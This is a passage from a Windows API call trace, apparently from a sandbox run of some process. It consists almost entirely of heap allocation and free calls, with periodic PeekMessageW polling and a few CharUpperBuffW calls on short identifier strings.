0x2aa94d8 [0090.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0090.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0090.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0090.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0090.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0090.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0090.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0090.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0090.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0090.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0090.870] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0090.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0090.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.871] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0090.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0090.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0090.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0090.871] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0090.871] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0090.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0090.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b58 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0090.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730a8 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0090.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73128 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0090.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71718 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0090.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0090.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0090.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0090.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0090.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0090.873] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0090.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0090.873] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0090.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0090.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0090.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0090.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0090.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0090.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0090.873] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0090.874] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0090.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0090.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0090.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.874] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0090.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0090.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0090.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.875] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0090.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0090.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0090.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0090.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.875] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0090.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0090.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0090.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0090.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0090.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0090.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0090.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0090.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0090.877] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0090.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0090.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0090.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0090.877] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0090.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 